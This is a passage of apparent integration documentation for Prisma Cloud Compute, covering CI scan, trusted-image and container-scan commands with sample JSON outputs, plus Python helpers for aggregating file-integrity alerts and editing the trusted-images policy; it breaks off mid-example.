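    {"_Id": "64ee7c3138b8ac44a6f3d458", "Hostname": "host123", "Path": "/tmp/alert/test1",
     "ProcessName": "touch", "User": "root", "EventType": "write",
     "Time": "2023-08-29T23:16:01.673Z", "RuleName": RULE},
    # Constructed events (assumption) to exercise the watched-path branches.
    {"_Id": "c0ffee01", "Hostname": "host123", "Path": "/etc/sudoers",
     "ProcessName": "vi", "User": "root", "EventType": "write",
     "Time": "2023-08-30T01:20:00.000Z", "RuleName": RULE},
    {"_Id": "c0ffee02", "Hostname": "host123", "Path": "/etc/hosts",
     "ProcessName": "dpkg", "User": "root", "EventType": "write",
     "Time": "2023-08-30T01:21:00.000Z", "RuleName": RULE},
]

if __name__ == "__main__":
    for g in aggregate_events(SAMPLE_EVENTS):
        print(f"{g['severity']:6} x{g['count']} {g['hostname']} {g['process']} "
              f"{g['event_type']} {g['path']} ({g['first_seen']} .. {g['last_seen']})")
```

With the sample input the `/etc/sudoers` edit by `vi` comes out on top, the three hourly `touch` events collapse into a single medium row with a count of 3, and the `dpkg` write under `/etc/` drops to low because it is on the expected-writer list; the baseline tables are the part to tune per environment.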

prisma-cloud-compute-unstuck-fetch-stream#


Releases a stuck fetch stream. Use it when the integration instance keeps creating duplicate incidents from the same alerts.

Base Command#

prisma-cloud-compute-unstuck-fetch-stream

Input#

  • No input.

Context Output#

  • No context output for this command.

Command example#

!prisma-cloud-compute-unstuck-fetch-stream

Human Readable Output#

The fetch stream was released successfully.

prisma-cloud-compute-ci-scan-results-list#


Retrieves scan reports for images scanned by the Jenkins plugin or twistcli. Maps to Monitor > Vulnerabilities > Images > CI in the Console UI. By default only scans that passed the CI policy are returned; set pass=false to list the scans that failed it.

Base Command#

prisma-cloud-compute-ci-scan-results-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| account_ids | A comma-separated list of cloud account IDs to filter the results by. | Optional |
| resource_ids | A comma-separated list of resource IDs to scope the query by. | Optional |
| region | A comma-separated list of regions to scope the query by. | Optional |
| scan_id | Scan ID used in the image layers fetch. | Optional |
| image_id | Image ID of the scanned image. | Optional |
| job_name | A comma-separated list of Jenkins job names. | Optional |
| search | Retrieves the results for a search term. | Optional |
| pass | Whether to return passed scans (true) or failed scans (false). Possible values are: true, false. Default is true. | Optional |
| scan_time_to | Filters results by end datetime, based on scan time. | Optional |
| scan_time_from | Filters results by start datetime, based on scan time. | Optional |
| limit | The maximum number of CI scan results to return. Must be between 1 and 50. Default is 50. | Optional |
| offset | The offset at which to begin listing CI scan results. Default is 0. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.CIScan._id | String | The scan ID. |
| PrismaCloudCompute.CIScan.time | String | The scan time. |
| PrismaCloudCompute.CIScan.pass | Boolean | Whether the scan passed the CI policy. |
| PrismaCloudCompute.CIScan.vulnFailureSummary | String | Vulnerability scan failure summary. |
| PrismaCloudCompute.CIScan.version | String | The scan version. |
| PrismaCloudCompute.CIScan.entityInfo._id | String | The scanned entity ID. |
| PrismaCloudCompute.CIScan.entityInfo.type | String | The scanned entity type. |
| PrismaCloudCompute.CIScan.entityInfo.hostname | String | The scanned entity hostname. |
| PrismaCloudCompute.CIScan.entityInfo.scanTime | String | The entity scan time. |
| PrismaCloudCompute.CIScan.entityInfo.binaries | Unknown | Binaries in the scanned entity. |
| PrismaCloudCompute.CIScan.entityInfo.Secrets | Unknown | Paths of secrets found in the scanned entity. |
| PrismaCloudCompute.CIScan.entityInfo.startupBinaries | Unknown | Startup binaries in the scanned entity. |
| PrismaCloudCompute.CIScan.entityInfo.osDistro | String | The OS distribution. |
| PrismaCloudCompute.CIScan.entityInfo.osDistroVersion | String | The OS distribution version. |
| PrismaCloudCompute.CIScan.entityInfo.osDistroRelease | String | The OS distribution release. |
| PrismaCloudCompute.CIScan.entityInfo.distro | String | The distribution. |
| PrismaCloudCompute.CIScan.entityInfo.packages | Unknown | Packages in the scanned entity. |
| PrismaCloudCompute.CIScan.entityInfo.files | Unknown | Files in the scanned entity. |
| PrismaCloudCompute.CIScan.entityInfo.packageManager | Boolean | Whether the scanned entity contains a package manager. |
| PrismaCloudCompute.CIScan.entityInfo.applications | Unknown | Applications in the scanned entity. |
| PrismaCloudCompute.CIScan.entityInfo.isARM64 | Boolean | Whether the scanned entity is ARM64. |
| PrismaCloudCompute.CIScan.entityInfo.packageCorrelationDone | Boolean | Whether package correlation was done. |
| PrismaCloudCompute.CIScan.entityInfo.redHatNonRPMImage | Boolean | Whether it is a Red Hat non-RPM image. |
| PrismaCloudCompute.CIScan.entityInfo.foundSecrets | Unknown | Whether secrets were found. |
| PrismaCloudCompute.CIScan.entityInfo.secretScanMetrics | Unknown | Secret scan metrics. |
| PrismaCloudCompute.CIScan.entityInfo.image | Unknown | The scanned image. |
| PrismaCloudCompute.CIScan.entityInfo.history | Unknown | The image history. |
| PrismaCloudCompute.CIScan.entityInfo.id | String | The entity ID. |
| PrismaCloudCompute.CIScan.entityInfo.complianceIssues | Unknown | Compliance issues found. |
| PrismaCloudCompute.CIScan.entityInfo.allCompliance | Unknown | All compliance data. |
| PrismaCloudCompute.CIScan.entityInfo.vulnerabilities | Unknown | Vulnerabilities found. |
| PrismaCloudCompute.CIScan.entityInfo.repoTag | Unknown | Repository tag. |
| PrismaCloudCompute.CIScan.entityInfo.tags | Unknown | Image tags. |
| PrismaCloudCompute.CIScan.entityInfo.repoDigests | Unknown | Repository digests. |
| PrismaCloudCompute.CIScan.entityInfo.creationTime | String | Image creation time. |
| PrismaCloudCompute.CIScan.entityInfo.pushTime | String | Image push time. |
| PrismaCloudCompute.CIScan.entityInfo.vulnerabilitiesCount | Number | Number of vulnerabilities found. |
| PrismaCloudCompute.CIScan.entityInfo.complianceIssuesCount | Number | Number of compliance issues found. |
| PrismaCloudCompute.CIScan.entityInfo.vulnerabilityDistribution | Unknown | Vulnerability counts by severity. |
| PrismaCloudCompute.CIScan.entityInfo.complianceDistribution | Unknown | Compliance issue counts by severity. |
| PrismaCloudCompute.CIScan.entityInfo.vulnerabilityRiskScore | Number | Vulnerability risk score. |
| PrismaCloudCompute.CIScan.entityInfo.complianceRiskScore | Number | Compliance risk score. |
| PrismaCloudCompute.CIScan.entityInfo.layers | Unknown | Image layer data. |
| PrismaCloudCompute.CIScan.entityInfo.topLayer | String | Top image layer. |
| PrismaCloudCompute.CIScan.entityInfo.riskFactors | Unknown | Risk factor data. |
| PrismaCloudCompute.CIScan.entityInfo.labels | Unknown | Image labels. |
| PrismaCloudCompute.CIScan.entityInfo.installedProducts | Unknown | Installed products data. |
| PrismaCloudCompute.CIScan.entityInfo.scanVersion | String | The scan version. |
| PrismaCloudCompute.CIScan.entityInfo.scanBuildDate | String | The scan build date. |
| PrismaCloudCompute.CIScan.entityInfo.firstScanTime | String | First scan time. |
| PrismaCloudCompute.CIScan.entityInfo.cloudMetadata | Unknown | Cloud metadata. |
| PrismaCloudCompute.CIScan.entityInfo.instances | Unknown | Instance data. |
| PrismaCloudCompute.CIScan.entityInfo.hosts | Unknown | Host data. |
| PrismaCloudCompute.CIScan.entityInfo.err | String | Error data. |
| PrismaCloudCompute.CIScan.entityInfo.collections | Unknown | Collection data. |
| PrismaCloudCompute.CIScan.entityInfo.scanID | Number | The scan ID. |
| PrismaCloudCompute.CIScan.entityInfo.trustStatus | String | Trust status data. |
| PrismaCloudCompute.CIScan.entityInfo.firewallProtection | Unknown | Firewall protection data. |
| PrismaCloudCompute.CIScan.entityInfo.appEmbedded | Boolean | Whether the app is embedded. |
| PrismaCloudCompute.CIScan.entityInfo.wildFireUsage | Unknown | WildFire usage data. |
| PrismaCloudCompute.CIScan.entityInfo.agentless | Boolean | Whether it is an agentless scan. |
| PrismaCloudCompute.CIScan.entityInfo.malwareAnalyzedTime | String | Malware analysis time. |

Command example#

!prisma-cloud-compute-ci-scan-results-list limit=2

Context Example#

```json
{
  "PrismaCloudCompute": {
    "CIScan": [
      {
        "_id": "aaa",
        "entityInfo": {
          "Secrets": [
            "/opt/az/lib/python3.10/test/key.pem"
          ],
          "_id": "sha256:a1",
          "agentless": false,
          "allCompliance": {},
          "appEmbedded": false,
          "applications": [
            {
              "installedFromPackage": true,
              "knownVulnerabilities": 115,
              "layerTime": 1695214343,
              "name": "node",
              "path": "/usr/bin/node",
              "version": "12.22.9"
            }
          ],
          "binaries": [
            {
              "cveCount": 0,
              "fileMode": 493,
              "md5": "a1",
              "name": "python3.10",
              "path": "/opt/az/bin/python3.10"
            },
            {
              "cveCount": 0,
              "fileMode": 420,
              "md5": "a2",
              "name": "python.o",
              "path": "/opt/az/lib/python3.10/config-3.10-x86_64-linux-gnu/python.o"
            }
          ],
          "cloudMetadata": {},
          "collections": [
            "All",
            "Access Group"
          ],
          "complianceDistribution": {
            "critical": 0,
            "high": 4,
            "low": 0,
            "medium": 1,
            "total": 5
          },
          "complianceIssues": [
            {
              "cause": "",
              "cri": false,
              "cve": "",
              "cvss": 0,
              "description": "It is a good practice to run the container as a non-root user, if possible.",
              "discovered": "0001-01-01T00:00:00Z",
              "exploit": "",
              "fixDate": 0,
              "functionLayer": "",
              "id": 41,
              "layerTime": 0,
              "link": "",
              "packageName": "",
              "packageVersion": "",
              "published": 0,
              "riskFactors": null,
              "secret": {},
              "severity": "high",
              "status": "",
              "templates": [
                "AAA"
              ],
              "text": "",
              "title": "Image should be created with a non-root user",
              "twistlock": false,
              "type": "image",
              "vecStr": "",
              "wildfireMalware": {}
            }
          ],
          "complianceIssuesCount": 5,
          "complianceRiskScore": 40100,
          "creationTime": "2023-09-20T12:53:00.899Z",
          "distro": "Ubuntu 22.04.3 LTS",
          "err": "",
          "files": [],
          "firewallProtection": {
            "enabled": false,
            "outOfBandMode": "",
            "supported": false
          },
          "firstScanTime": "2023-09-20T12:53:12.177Z",
          "foundSecrets": null,
          "history": [
            {
              "created": 1692165712,
              "emptyLayer": true,
              "id": "11",
              "instruction": "RELEASE"
            }
          ],
          "hostname": "aaa",
          "hosts": {},
          "id": "sha256:a3",
          "image": {
            "created": "2023-09-20T12:53:00.899Z",
            "entrypoint": [
              "python3"
            ]
          },
          "installedProducts": {
            "docker": "24.0.6",
            "hasPackageManager": true,
            "osDistro": "Ubuntu"
          },
          "instances": [
            {
              "host": "a4",
              "image": "1.dkr.ecr.eu-central-1.amazonaws.com/pythonscript:a3",
              "modified": "2023-09-20T12:53:36.956Z",
              "registry": "1.dkr.ecr.eu-central-1.amazonaws.com",
              "repo": "pythonscript",
              "tag": "tag"
            }
          ],
          "isARM64": false,
          "labels": [
            "org.opencontainers.image.ref.name:ubuntu"
          ],
          "layers": [
            "sha256:a5"
          ],
          "malwareAnalyzedTime": "0001-01-01T00:00:00Z",
          "osDistro": "ubuntu",
          "osDistroRelease": "jammy",
          "osDistroVersion": "22.04",
          "packageCorrelationDone": true,
          "packageManager": true,
          "pushTime": "0001-01-01T00:00:00Z",
          "redHatNonRPMImage": false,
          "repoDigests": [],
          "repoTag": {
            "registry": "1.dkr.ecr.eu-central-1.amazonaws.com",
            "repo": "pythonscript",
            "tag": "tag"
          },
          "riskFactors": {
            "Attack complexity: low": {},
            "Attack vector: network": {},
            "Critical severity": {},
            "DoS - High": {},
            "DoS - Low": {},
            "Exploit exists - POC": {},
            "Has fix": {},
            "High severity": {},
            "Medium severity": {},
            "Recent vulnerability": {},
            "Remote execution": {}
          },
          "scanBuildDate": "20230914",
          "scanID": 0,
          "scanTime": "2023-09-20T12:53:36.956Z",
          "scanVersion": "31.01.131",
          "secretScanMetrics": {},
          "tags": [
            {
              "registry": "1.dkr.ecr.eu-central-1.amazonaws.com",
              "repo": "pythonscript",
              "tag": "tag"
            }
          ],
          "topLayer": "sha256:a6",
          "trustStatus": "",
          "type": "ciImage",
          "vulnerabilitiesCount": 81,
          "vulnerabilityDistribution": {
            "critical": 1,
            "high": 5,
            "low": 34,
            "medium": 41,
            "total": 81
          },
          "vulnerabilityRiskScore": 1054134,
          "wildFireUsage": null
        },
        "pass": true,
        "time": "2023-09-20T12:53:37.229Z",
        "version": "30.01.1"
      },
      {
        "_id": "bbb",
        "entityInfo": {
          "Secrets": [
            "/opt/aa/lib/python3.10/test/secret.pem"
          ],
          "_id": "sha256:f3",
          "agentless": false,
          "allCompliance": {},
          "appEmbedded": false,
          "applications": [
            {
              "installedFromPackage": true,
              "knownVulnerabilities": 115,
              "layerTime": 1695209203,
              "name": "ccc",
              "path": "/usr/bin/node",
              "version": "12.01.01"
            }
          ],
          "cloudMetadata": {},
          "collections": [
            "Access Group"
          ],
          "complianceDistribution": {
            "critical": 0,
            "high": 4,
            "low": 0,
            "medium": 1,
            "total": 5
          },
          "complianceIssuesCount": 5,
          "complianceRiskScore": 40100,
          "creationTime": "2023-09-20T11:27:10.233Z",
          "distro": "Ubuntu 22.04.3 LTS",
          "err": "",
          "files": [],
          "firewallProtection": {
            "enabled": false,
            "outOfBandMode": "",
            "supported": false
          },
          "firstScanTime": "2023-09-20T11:27:22.081Z",
          "foundSecrets": null,
          "hostname": "aaa",
          "hosts": {},
          "id": "sha256:a1",
          "image": {
            "created": "2023-09-20T11:27:10.233Z",
            "entrypoint": [
              "python3"
            ]
          },
          "installedProducts": {
            "docker": "24.0.6",
            "hasPackageManager": true,
            "osDistro": "Ubuntu 22.04.3 LTS"
          },
          "instances": [
            {
              "host": "aaa",
              "image": "pythonserver.azurecr.io/pythonserver:a1",
              "modified": "2023-09-20T11:27:50.809Z",
              "registry": "pythonserver.azurecr.io",
              "repo": "pythonserver",
              "tag": "a1"
            }
          ],
          "isARM64": false,
          "labels": [
            "org.opencontainers.image.ref.name:ubuntu",
            "org.opencontainers.image.version:22.04"
          ],
          "layers": [
            "sha256:a1"
          ],
          "malwareAnalyzedTime": "0001-01-01T00:00:00Z",
          "osDistro": "ubuntu",
          "osDistroRelease": "jammy",
          "osDistroVersion": "22.04",
          "packageCorrelationDone": true,
          "packageManager": true,
          "pushTime": "0001-01-01T00:00:00Z",
          "redHatNonRPMImage": false,
          "repoDigests": [],
          "repoTag": {
            "registry": "pythonserver.azurecr.io",
            "repo": "pythonserver",
            "tag": "tag"
          },
          "riskFactors": {
            "Attack complexity: low": {},
            "Attack vector: network": {},
            "Critical severity": {},
            "DoS - High": {},
            "DoS - Low": {},
            "Exploit exists - POC": {},
            "Has fix": {},
            "High severity": {},
            "Medium severity": {},
            "Recent vulnerability": {},
            "Remote execution": {}
          },
          "scanBuildDate": "20230914",
          "scanID": 0,
          "scanTime": "2023-09-20T11:27:50.809Z",
          "scanVersion": "31.01.131",
          "secretScanMetrics": {},
          "tags": [
            {
              "registry": "pythonserver.azurecr.io",
              "repo": "pythonserver",
              "tag": "tag"
            }
          ],
          "topLayer": "sha256:a6",
          "trustStatus": "",
          "type": "ciImage",
          "vulnerabilitiesCount": 72,
          "vulnerabilityDistribution": {
            "critical": 1,
            "high": 5,
            "low": 34,
            "medium": 32,
            "total": 72
          },
          "vulnerabilityRiskScore": 1053234,
          "wildFireUsage": null
        },
        "pass": true,
        "time": "2023-09-20T11:27:51.087Z",
        "version": "31.01.131"
      }
    ]
  }
}
```

Human Readable Output#

CI Scan Information#

| Image | ID | OS Distribution | OS Release | Scan Status | Scan Time |
| --- | --- | --- | --- | --- | --- |
| 1.dkr.ecr.eu-central-1.amazonaws.com/pythonscript:tag | sha256:a6 | ubuntu | jammy | true | 2023-09-20T12:53:37.229Z |
| pythonserver.azurecr.io/pythonserver:a1 | sha256:a5 | ubuntu | jammy | true | 2023-09-20T11:27:51.087Z |

prisma-cloud-compute-trusted-images-list#


Returns the trusted registries, repositories, and images. Maps to the image table in Defend > Compliance > Trusted Images in the Console UI.

Base Command#

prisma-cloud-compute-trusted-images-list

Input#

There are no input arguments for this command.

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.TrustedImage.policy.enabled | Boolean | Whether the trusted image policy is enabled. |
| PrismaCloudCompute.TrustedImage.policy._id | String | The ID of the trusted image policy. |
| PrismaCloudCompute.TrustedImage.policy.rules.name | String | The name of the trusted image rule. |
| PrismaCloudCompute.TrustedImage.policy.rules.allowedGroups | Unknown | The allowed groups for the trusted image rule. |
| PrismaCloudCompute.TrustedImage.policy.rules.effect | String | The effect of the trusted image rule. |
| PrismaCloudCompute.TrustedImage.policy.rules.modified | Date | The last modified timestamp for the trusted image rule. |
| PrismaCloudCompute.TrustedImage.policy.rules.previousName | String | The previous name of the trusted image rule. |
| PrismaCloudCompute.TrustedImage.policy.rules.owner | String | The owner of the trusted image rule. |
| PrismaCloudCompute.TrustedImage.policy.rules.disabled | Boolean | Whether the trusted image rule is disabled. |
| PrismaCloudCompute.TrustedImage.policy.rules.collections | Unknown | The collections for the trusted image rule. |
| PrismaCloudCompute.TrustedImage.groups.modified | Date | The last modified timestamp for the trusted image group. |
| PrismaCloudCompute.TrustedImage.groups.owner | String | The owner of the trusted image group. |
| PrismaCloudCompute.TrustedImage.groups.name | String | The name of the trusted image group. |
| PrismaCloudCompute.TrustedImage.groups.previousName | String | The previous name of the trusted image group. |
| PrismaCloudCompute.TrustedImage.groups._id | String | The ID of the trusted image group. |
| PrismaCloudCompute.TrustedImage.groups.images | Unknown | The images in the trusted image group. |

Command example#

!prisma-cloud-compute-trusted-images-list

Context Example#

{
"PrismaCloudCompute": {
"TrustedImage": {
"groups": [
{
"_id": "Deny All",
"images": [
"*gg/*"
],
"modified": "2022-04-27T17:30:02.803Z",
"name": "",
"owner": "test@paloaltonetworks.com",
"previousName": ""
},
{
"_id": "TRUSTED IMAGES",
"images": [
"img/aa:*",
"img/bb:*"
],
"modified": "2023-02-27T21:35:49.697Z",
"name": "",
"owner": "test@paloaltonetworks.com",
"previousName": ""
},
{
"_id": "test",
"images": [
"img/abc:*"
],
"modified": "2023-02-28T19:53:44.491Z",
"name": "",
"owner": "test@paloaltonetworks.com",
"previousName": ""
}
],
"policy": {
"_id": "trust",
"enabled": true,
"rules": [
{
"allowedGroups": [
"test"
],
"collections": [
{
"accountIDs": [
"*"
],
"appIDs": [
"*"
],
"clusters": [
"*"
],
"codeRepos": [
"*"
],
"color": "#3FA2F7",
"containers": [
"*"
],
"description": "System - all resources collection",
"functions": [
"*"
],
"hosts": [
"*"
],
"images": [
"*"
],
"labels": [
"*"
],
"modified": "2021-01-31T08:21:54.823Z",
"name": "All",
"namespaces": [
"*"
],
"owner": "system",
"prisma": false,
"system": true
}
],
"disabled": true,
"effect": "alert",
"modified": "2023-06-08T12:28:46.723Z",
"name": "test",
"owner": "test@paloaltonetworks.com",
"previousName": ""
},
{
"collections": [
{
"accountIDs": [
"*"
],
"appIDs": [
"*"
],
"clusters": [
"*"
],
"codeRepos": [
"*"
],
"color": "#3FA2F7",
"containers": [
"*"
],
"description": "System - all resources collection",
"functions": [
"*"
],
"hosts": [
"*"
],
"images": [
"*"
],
"labels": [
"*"
],
"modified": "2021-01-31T08:21:54.823Z",
"name": "All",
"namespaces": [
"*"
],
"owner": "system",
"prisma": false,
"system": true
}
],
"disabled": true,
"effect": "alert",
"modified": "2022-04-27T19:24:00.987Z",
"name": "Default - alert all",
"owner": "test@paloaltonetworks.com",
"previousName": ""
}
]
}
}
}
}

Human Readable Output#

Trusted Images Details#

Policy Rules Information#

| Rule Name | Effect | Owner | Allowed Groups | Modified |
| --- | --- | --- | --- | --- |
| test | alert | test@paloaltonetworks.com | test | 2023-06-08T12:28:46.723Z |
| Default - alert all | alert | test@paloaltonetworks.com | | 2022-04-27T19:24:00.987Z |

Trust Groups Information#

| ID | Owner | Modified |
| --- | --- | --- |
| Deny All | test@paloaltonetworks.com | 2022-04-27T17:30:02.803Z |
| TRUSTED IMAGES | test@paloaltonetworks.com | 2023-02-27T21:35:49.697Z |
| test | test@paloaltonetworks.com | 2023-02-28T19:53:44.491Z |

prisma-cloud-compute-trusted-images-update#


Updates the trusted images in the system. Specify trusted images using either the image name or the layers property. This is a potentially harmful command, so use it with caution.

Base Command#

prisma-cloud-compute-trusted-images-update

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| images_list_json | JSON containing the list of trusted images to update. In order to view the structure, use prisma-cloud-compute-trusted-images-list to retrieve the current state of the list. | Required |

Context Output#

There is no context output for this command.
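Because the update command replaces the whole trusted-images list, the safest workflow is to take the output of prisma-cloud-compute-trusted-images-list, change one thing, validate the shape, and serialise it back. The following is an added example, not part of the integration's own code; it assumes that images_list_json accepts the same structure the list command returns, and the sample object is constructed from the context example above.

```python
import copy
import json

# Constructed sample shaped like the PrismaCloudCompute.TrustedImage context
# returned by prisma-cloud-compute-trusted-images-list (placeholder values).
SAMPLE_TRUSTED_IMAGE = {
    "groups": [
        {"_id": "Deny All", "images": ["*gg/*"], "name": "",
         "owner": "test@paloaltonetworks.com", "previousName": "",
         "modified": "2022-04-27T17:30:02.803Z"},
        {"_id": "test", "images": ["img/abc:*"], "name": "",
         "owner": "test@paloaltonetworks.com", "previousName": "",
         "modified": "2023-02-28T19:53:44.491Z"},
    ],
    "policy": {
        "_id": "trust",
        "enabled": True,
        "rules": [
            {"name": "test", "allowedGroups": ["test"], "effect": "alert",
             "disabled": True, "owner": "test@paloaltonetworks.com"},
            {"name": "Default - alert all", "effect": "alert",
             "disabled": True, "owner": "test@paloaltonetworks.com"},
        ],
    },
}


def validate_trusted_image(ctx: dict) -> None:
    """Reject anything that does not have the shape the list command returns."""
    if not isinstance(ctx.get("groups"), list) or not isinstance(ctx.get("policy"), dict):
        raise ValueError("expected a 'groups' list and a 'policy' object")
    for group in ctx["groups"]:
        if not isinstance(group.get("_id"), str) or not isinstance(group.get("images"), list):
            raise ValueError(f"malformed trust group: {group!r}")
    if not isinstance(ctx["policy"].get("rules"), list):
        raise ValueError("policy has no 'rules' list")


def add_image_to_group(ctx: dict, group_id: str, image_pattern: str) -> dict:
    """Return a deep copy of ctx with image_pattern added to the group named group_id.

    The input is left untouched so the caller can diff the two objects before
    handing the result to the update command. Adding a pattern that is already
    present is a no-op, so re-running the step cannot duplicate entries.
    """
    validate_trusted_image(ctx)
    updated = copy.deepcopy(ctx)
    for group in updated["groups"]:
        if group["_id"] == group_id:
            if image_pattern not in group["images"]:
                group["images"].append(image_pattern)
            return updated
    raise KeyError(f"no trust group with _id {group_id!r}")


def active_rules_for_group(ctx: dict, group_id: str) -> list:
    """Names of enabled policy rules whose allowedGroups reference group_id.

    An empty result means no rule enforces the group, so trusting an image
    through it changes nothing at admission time (both rules in the sample
    are disabled, which is exactly the case to catch before updating).
    """
    return [
        rule["name"]
        for rule in ctx["policy"]["rules"]
        if not rule.get("disabled") and group_id in rule.get("allowedGroups", [])
    ]


def build_update_argument(ctx: dict) -> str:
    """Serialise the object as the images_list_json argument value.

    Assumption: the argument accepts the same structure the list command returns.
    """
    validate_trusted_image(ctx)
    return json.dumps(ctx, separators=(",", ":"), sort_keys=True)


if __name__ == "__main__":
    new_ctx = add_image_to_group(SAMPLE_TRUSTED_IMAGE, "test", "img/def:*")
    print("rules enforcing group 'test':", active_rules_for_group(new_ctx, "test"))
    print(build_update_argument(new_ctx)[:80], "...")
```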

prisma-cloud-compute-container-scan-results-list#


Retrieves container scan reports. Maps to Monitor > Compliance > Images > Deployed in the Console UI.

Base Command#

prisma-cloud-compute-container-scan-results-list

Input#

| Argument Name | Description | Required |
| --- | --- | --- |
| collections | A comma-separated list of collection names that you have defined in Prisma Cloud Compute. | Optional |
| account_ids | A comma-separated list of cloud account IDs. | Optional |
| clusters | A comma-separated list of clusters to filter by. | Optional |
| namespaces | A comma-separated list of namespaces to filter by. | Optional |
| resource_ids | A comma-separated list of resource IDs to scope the query by. | Optional |
| region | A comma-separated list of regions to scope the query by. | Optional |
| container_ids | A comma-separated list of container IDs to retrieve details for. | Optional |
| profile_id | A comma-separated list of runtime profile IDs to filter by. | Optional |
| image_name | A comma-separated list of image names to filter by. | Optional |
| image_id | A comma-separated list of image IDs to filter by. | Optional |
| hostname | A comma-separated list of hostnames to filter by. | Optional |
| compliance_ids | A comma-separated list of compliance IDs to filter by. | Optional |
| agentless | Whether to filter by agentless scans. Possible values are: true, false. | Optional |
| search | Term to search for. | Optional |
| limit | The maximum number of container scan reports to return. Must be between 1-50. Default is 50. | Optional |
| offset | The offset by which to begin listing container scan reports. Default is 0. | Optional |
| all_results | Whether to retrieve all results; the "limit" argument is then ignored. This may return a large number of results and slow down the command, so it is not recommended for frequent use. Possible values are: true, false. Default is false. | Optional |

Context Output#

| Path | Type | Description |
| --- | --- | --- |
| PrismaCloudCompute.ContainersScanResults._id | String | The container scan ID. |
| PrismaCloudCompute.ContainersScanResults.hostname | String | The container hostname. |
| PrismaCloudCompute.ContainersScanResults.scanTime | Date | The container scan time. |
| PrismaCloudCompute.ContainersScanResults.collections | Unknown | The collections the container belongs to. |
| PrismaCloudCompute.ContainersScanResults.firewallProtection | Unknown | Firewall protection data. |
| PrismaCloudCompute.ContainersScanResults.csa | Boolean | Container security assessment data. |
| PrismaCloudCompute.ContainersScanResults.info.name | String | The container name. |
| PrismaCloudCompute.ContainersScanResults.info.profileID | String | The profile ID. |
| PrismaCloudCompute.ContainersScanResults.info.infra | Boolean | Whether the container is infrastructure. |
| PrismaCloudCompute.ContainersScanResults.info.id | String | The container ID. |
| PrismaCloudCompute.ContainersScanResults.info.ImageID | String | The container image ID. |
| PrismaCloudCompute.ContainersScanResults.info.image | String | The container image. |
| PrismaCloudCompute.ContainersScanResults.info.imageName | String | The container image name. |
| PrismaCloudCompute.ContainersScanResults.info.app | String | The container application name. |
| PrismaCloudCompute.ContainersScanResults.info.namespace | String | The container namespace. |
| PrismaCloudCompute.ContainersScanResults.info.cluster | String | The container cluster name. |
| PrismaCloudCompute.ContainersScanResults.info.clusterType | String | The container cluster type. |
| PrismaCloudCompute.ContainersScanResults.info.externalLabels | Unknown | Container external labels. |
| PrismaCloudCompute.ContainersScanResults.info.complianceIssues | Unknown | Compliance issues found. |
| PrismaCloudCompute.ContainersScanResults.info.allCompliance | Unknown | All compliance data. |
| PrismaCloudCompute.ContainersScanResults.info.complianceIssuesCount | Number | Number of compliance issues. |
| PrismaCloudCompute.ContainersScanResults.info.complianceRiskScore | Number | Compliance risk score. |
| PrismaCloudCompute.ContainersScanResults.info.complianceDistribution | Unknown | Compliance issue distribution. |
| PrismaCloudCompute.ContainersScanResults.info.processes | Unknown | Container processes data. |
| PrismaCloudCompute.ContainersScanResults.info.network | Unknown | Network data. |
| PrismaCloudCompute.ContainersScanResults.info.labels | Unknown | Container labels. |
| PrismaCloudCompute.ContainersScanResults.info.installedProducts | Unknown | Installed products data. |
| PrismaCloudCompute.ContainersScanResults.info.cloudMetadata | Unknown | Cloud metadata. |
| PrismaCloudCompute.ContainersScanResults.info.startTime | Date | Container start time. |

Command example#

!prisma-cloud-compute-container-scan-results-list limit=2

Context Example#

{
"PrismaCloudCompute": {
"ContainersScanResults": [
{
"_id": "a1",
"collections": [
"All",
"Access Group"
],
"csa": false,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"hostname": "a1",
"info": {
"allCompliance": {},
"app": "a2",
"cloudMetadata": {
"accountID": "ii",
"image": "img",
"name": "a1",
"provider": "gcp",
"region": "europe-west4-c",
"resourceID": "4"
},
"cluster": "demo",
"clusterType": "GKE",
"complianceDistribution": {
"critical": 7,
"high": 5,
"low": 0,
"medium": 0,
"total": 12
},
"complianceIssues": [
{
"cause": "",
"cri": false,
"cve": "",
"cvss": 0,
"description": "Process ID (PID) namespaces isolate the process ID number space",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"fixDate": 0,
"functionLayer": "",
"id": 515,
"layerTime": 0,
"link": "",
"packageName": "",
"packageVersion": "",
"published": 0,
"riskFactors": null,
"secret": {},
"severity": "critical",
"status": "",
"templates": [
"GGG"
],
"text": "",
"title": "Do not share the process namespace",
"twistlock": false,
"type": "container",
"vecStr": "",
"wildfireMalware": {}
}
],
"complianceIssuesCount": 12,
"complianceRiskScore": 7050000,
"id": "a4",
"image": "img3",
"imageID": "sha256:a5",
"imageName": "img5",
"infra": false,
"installedProducts": {
"crio": true
},
"labels": [
"aa"
],
"name": "a7",
"namespace": "system",
"network": {
"ports": []
},
"processes": [
{
"name": "a7"
}
],
"profileID": "sha256:a3",
"startTime": "2023-09-10T01:46:16.542Z"
},
"scanTime": "2023-09-26T01:46:44.579Z"
},
{
"_id": "a2",
"agentless": true,
"agentlessScanID": 476,
"collections": [
"All"
],
"csa": false,
"firewallProtection": {
"enabled": false,
"outOfBandMode": "",
"supported": false
},
"hostname": "hostname",
"info": {
"allCompliance": {},
"app": "app9",
"cloudMetadata": {
"accountID": "66",
"image": "img7",
"name": "a5-master",
"provider": "aws",
"region": "eu-south-1",
"resourceID": "i-3",
"type": "m5.xlarge"
},
"cluster": "a5",
"clusterType": "",
"complianceDistribution": {
"critical": 7,
"high": 5,
"low": 0,
"medium": 0,
"total": 12
},
"complianceIssues": [
{
"cause": "",
"cri": true,
"cve": "",
"cvss": 0,
"description": "The main container's host has full access to its network interfaces",
"discovered": "0001-01-01T00:00:00Z",
"exploit": "",
"fixDate": 0,
"functionLayer": "",
"id": 5059,
"layerTime": 0,
"link": "",
"packageName": "",
"packageVersion": "",
"published": 0,
"riskFactors": null,
"secret": {},
"severity": "critical",
"status": "",
"templates": null,
"text": "",
"title": "Do not share the host's network namespace",
"twistlock": false,
"type": "container",
"vecStr": "",
"wildfireMalware": {}
}
],
"complianceIssuesCount": 12,
"complianceRiskScore": 7050000,
"id": "a5",
"image": "a7",
"imageID": "a9",
"imageName": "a7",
"infra": false,
"installedProducts": {
"crio": true
},
"labels": [
"tag"
],
"name": "aaa",
"namespace": "test",
"network": {
"ports": []
},
"processes": [],
"profileID": "a9_test_a5",
